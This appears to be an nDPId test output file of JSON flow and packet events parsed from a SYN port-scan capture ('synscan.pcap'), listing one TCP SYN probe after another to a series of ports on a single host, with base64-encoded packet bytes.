+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs728AAC8GKgOsEAAIQA2GNIzTACrdU4MZAAAAAGACEAAoYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2IAACsGfhCsEAAIQA2GNIzTdTDdU4MZAAAAAGACEACzWwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsaiIAADUGqVCsEAAIQA2GNIzTEyTdU4MZAAAAAGACCAAdaAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADEGgdysEAAIQA2GNIzTD5vdU4MZAAAAAGACCAAg8QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAADgGTEqsEAAIQA2GNIzTBBzdU4MZAAAAAGACBAAwcAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6LcAADgGJ7usEAAIQA2GNIzTBD7dU4MZAAAAAGACBAAwTgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsmusAACsGgoesEAAIQA2GNIzTDdrdU4MZAAAAAGACEAAasgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN8AADAGE5SsEAAIQA2GNIzTTYLdU4MZAAAAAGACBADnCQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6BkAADcGKVmsEAAIQA2GNIzTS3PdU4MZAAAAAGACEADdGAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAspmYAACkGeQysEAAIQA2GNIzTBMLdU4MZAAAAAGACCAArygAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsgl0AACUGoRWsEAAIQA2GNIzSAG3dUoMYAAAAAGACCAAwIgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsoOwAACYGgYasEAAIQA2GNIzSB8\/dUoMYAAAAAGACDAAkwAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3VgAACgGQxqsEAAIQA2GNIzSEB3dUoMYAAAAAGACBAAkcgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12265,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zgAADQGNTqsEAAIQA2GNIzSL+ndUoMYAAAAAGACBAAEpgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsarwAADIGq7asEAAIQA2GNIzSwAvdUoMYAAAAAGACDABsgwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAswXIAAC4GWQCsEAAIQA2GNIzSBD3dUoMYAAAAAGACDAAoUgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsAosAADQGEeisEAAIQA2GNIzSFyLdUoMYAAAAAGACBAAdbQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jUAADUGQT2sEAAIQA2GNIzSgA7dUoMYAAAAAGACCACwgAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oMAACkGNO+sEAAIQA2GNIzSBDfdUoMYAAAAAGACCAAsWAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs78YAACwGLKysEAAIQA2GNIzSBHXdUoMYAAAAAGACBAAwGgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GgAACkGKwqsEAAIQA2GNIzSAmndUoMYAAAAAGACCAAuJgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsJhYAADUG7VysEAAIQA2GNIzTKXndU4MZAAAAAGACCAAHEwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsDq4AACcGEsWsEAAIQA2GNIzTCDvdU4MZAAAAAGACEAAgUQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsKtQAACwG8Z6sEAAIQA2GNIzTJtfdU4MZAAAAAGACBAANtQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsiiIAADcGh1CsEAAIQA2GNIzTBy\/dU4MZAAAAAGACEAAhXQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 